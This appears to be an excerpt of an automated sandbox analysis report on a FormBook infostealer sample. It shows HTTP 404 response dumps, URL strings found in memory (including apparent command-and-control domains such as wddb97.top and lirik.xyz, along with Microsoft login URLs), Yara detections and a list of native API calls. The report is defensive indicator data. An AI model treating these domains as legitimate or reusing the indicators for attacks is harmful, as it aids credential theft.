74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 05:53:21 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 05:53:23 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 05:53:30 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a747c1-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 05:53:32 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a747c1-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 05:53:35 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a747c1-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 05:53:37 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a747c1-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 05:53:57 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3a46-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 05:53:59 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3a46-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 05:54:02 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3a46-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: icacls.exe, 0000000D.00000002.4129046811.0000000003894000.00000004.10000000.00040000.00000000.sdmp, qLmzoTzSrlQuBN.exe, 00000013.00000002.4128138282.0000000002E74000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2188781216.0000000025FA4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
Source: fHkdf4WB7zhMcqP.exe, vssfbkdOErXuYi.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: fHkdf4WB7zhMcqP.exe, vssfbkdOErXuYi.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: fHkdf4WB7zhMcqP.exe, vssfbkdOErXuYi.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: fHkdf4WB7zhMcqP.exe, 00000000.00000002.1774386531.00000000029EA000.00000004.00000800.00020000.00000000.sdmp, vssfbkdOErXuYi.exe, 00000009.00000002.1925293857.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783004757.00000000054B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.comG
Source: fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: qLmzoTzSrlQuBN.exe, 00000013.00000002.4129656762.0000000004F19000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.wddb97.top
Source: qLmzoTzSrlQuBN.exe, 00000013.00000002.4129656762.0000000004F19000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.wddb97.top/cjue/
Source: fHkdf4WB7zhMcqP.exe, 00000000.00000002.1783212677.0000000006C02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: icacls.exe, 0000000D.00000002.4131037974.00000000079BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: icacls.exe, 0000000D.00000002.4131037974.00000000079BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: icacls.exe, 0000000D.00000002.4131037974.00000000079BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: icacls.exe, 0000000D.00000002.4131037974.00000000079BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: icacls.exe, 0000000D.00000002.4131037974.00000000079BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: icacls.exe, 0000000D.00000002.4131037974.00000000079BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: icacls.exe, 0000000D.00000002.4131037974.00000000079BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: icacls.exe, 0000000D.00000002.4129046811.0000000004E90000.00000004.10000000.00040000.00000000.sdmp, qLmzoTzSrlQuBN.exe, 00000013.00000002.4128138282.0000000004470000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lirik.xyz/
Source: icacls.exe, 0000000D.00000002.4127000358.00000000028F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: icacls.exe, 0000000D.00000002.4127000358.00000000028F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: icacls.exe, 0000000D.00000002.4127000358.00000000028F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: icacls.exe, 0000000D.00000002.4127000358.00000000028CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: icacls.exe, 0000000D.00000002.4127000358.00000000028CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: icacls.exe, 0000000D.00000003.2077616815.0000000007994000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: fHkdf4WB7zhMcqP.exe, vssfbkdOErXuYi.exe.0.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: icacls.exe, 0000000D.00000002.4131037974.00000000079BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: icacls.exe, 0000000D.00000002.4129046811.0000000004392000.00000004.10000000.00040000.00000000.sdmp, icacls.exe, 0000000D.00000002.4129046811.0000000003D4A000.00000004.10000000.00040000.00000000.sdmp, icacls.exe, 0000000D.00000002.4130793758.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, qLmzoTzSrlQuBN.exe, 00000013.00000002.4128138282.0000000003972000.00000004.00000001.00040000.00000000.sdmp, qLmzoTzSrlQuBN.exe, 00000013.00000002.4128138282.000000000332A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1976879958.0000000006940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4127950184.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4128067696.0000000002C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1895730632.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4127873755.00000000040F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4126760720.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.4129656762.0000000004EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1897010665.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0042CAC3 NtClose,	8_2_0042CAC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2B60 NtClose,LdrInitializeThunk,	8_2_017F2B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2DF0 NtQuerySystemInformation,LdrInitializeThunk,	8_2_017F2DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2C70 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_017F2C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F35C0 NtCreateMutant,LdrInitializeThunk,	8_2_017F35C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F4340 NtSetContextThread,	8_2_017F4340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F4650 NtSuspendThread,	8_2_017F4650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2BF0 NtAllocateVirtualMemory,	8_2_017F2BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2BE0 NtQueryValueKey,	8_2_017F2BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2BA0 NtEnumerateValueKey,	8_2_017F2BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2B80 NtQueryInformationFile,	8_2_017F2B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2AF0 NtWriteFile,	8_2_017F2AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2AD0 NtReadFile,	8_2_017F2AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2AB0 NtWaitForSingleObject,	8_2_017F2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2D30 NtUnmapViewOfSection,	8_2_017F2D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2D10 NtMapViewOfSection,	8_2_017F2D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2D00 NtSetInformationFile,	8_2_017F2D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2DD0 NtDelayExecution,	8_2_017F2DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2DB0 NtEnumerateKey,	8_2_017F2DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2C60 NtCreateKey,	8_2_017F2C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_017F2C00 NtQueryInformationProcess,	8_2_017F2C00
